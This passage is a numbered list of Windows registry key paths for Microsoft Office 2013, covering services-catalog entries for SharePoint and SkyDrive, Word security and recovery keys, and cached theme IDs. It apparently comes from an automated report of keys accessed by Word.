954. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\CapabilitiesMetadata",
955. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Description",
956. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Name",
957. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceId",
958. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceUrl",
959. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata",
960. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\KeyTip",
961. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\Type",
962. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT",
963. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Capabilities",
964. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ConnectMechanism",
965. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsManaged",
966. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsRemovable",
967. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceOwner",
968. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SortOrder",
969. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SupportsMultiple",
970. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\CapabilitiesMetadata",
971. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Description",
972. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Name",
973. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceId",
974. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceUrl",
975. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata",
976. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\DefaultFolderRelativePath",
977. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\KeyTip",
978. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\Type",
979. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails",
980. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url16x16",
981. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url32x32",
982. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url48x48",
983. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP",
984. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Capabilities",
985. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ConnectMechanism",
986. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsManaged",
987. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsRemovable",
988. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceOwner",
989. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SortOrder",
990. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SupportsMultiple",
991. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\CapabilitiesMetadata",
992. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Description",
993. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Name",
994. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceId",
995. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceUrl",
996. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata",
997. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\KeyTip",
998. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\Type",
999. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails",
1000. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
1001. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
1002. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
1003. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER",
1004. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Capabilities",
1005. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ConnectMechanism",
1006. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsManaged",
1007. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsRemovable",
1008. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceOwner",
1009. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SortOrder",
1010. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SupportsMultiple",
1011. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\CapabilitiesMetadata",
1012. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Description",
1013. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Name",
1014. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceId",
1015. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceUrl",
1016. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata",
1017. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\HideIfEmpty",
1018. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\KeyTip",
1019. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\Type",
1020. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails",
1021. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url16x16",
1022. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url32x32",
1023. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url48x48",
1024. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE",
1025. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Capabilities",
1026. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ConnectMechanism",
1027. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsManaged",
1028. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsRemovable",
1029. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceOwner",
1030. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SortOrder",
1031. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SupportsMultiple",
1032. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\CapabilitiesMetadata",
1033. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Description",
1034. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Name",
1035. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceId",
1036. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceUrl",
1037. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata",
1038. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
1039. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
1040. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\KeyTip",
1041. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\RegularExpression",
1042. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\Type",
1043. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails",
1044. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url16x16",
1045. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url32x32",
1046. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url48x48",
1047. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT",
1048. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Capabilities",
1049. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ConnectMechanism",
1050. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsManaged",
1051. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsRemovable",
1052. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceOwner",
1053. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SortOrder",
1054. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SupportsMultiple",
1055. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Description",
1056. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Name",
1057. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceId",
1058. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceUrl",
1059. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails",
1060. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url16x16",
1061. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url32x32",
1062. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url48x48",
1063. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE",
1064. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Capabilities",
1065. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ConnectMechanism",
1066. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsManaged",
1067. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsRemovable",
1068. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceOwner",
1069. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SortOrder",
1070. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SupportsMultiple",
1071. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Description",
1072. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Name",
1073. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceId",
1074. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceUrl",
1075. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails",
1076. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url16x16",
1077. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url32x32",
1078. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url48x48",
1079. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE",
1080. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Capabilities",
1081. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ConnectMechanism",
1082. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsManaged",
1083. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsRemovable",
1084. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceOwner",
1085. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SortOrder",
1086. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SupportsMultiple",
1087. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\CapabilitiesMetadata",
1088. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Description",
1089. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Name",
1090. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceId",
1091. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceUrl",
1092. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata",
1093. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
1094. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
1095. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\KeyTip",
1096. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\RegularExpression",
1097. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\Type",
1098. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails",
1099. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url16x16",
1100. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url32x32",
1101. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url48x48",
1102. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\ProductFiles",
1103. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
1104. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
1105. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Licensing\\09D07EFC505F4D9CBFD5ACE3217F6654",
1106. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1660403\\182CE20",
1107. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090434",
1108. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457503",
1109. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033917",
1110. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457510",
1111. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001105",
1112. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033919",
1113. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457464",
1114. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457475",
1115. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033925",
1116. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033927",
1117. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457485",
1118. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033937",
1119. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001106",
1120. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033921",
1121. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457444",
1122. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090430",
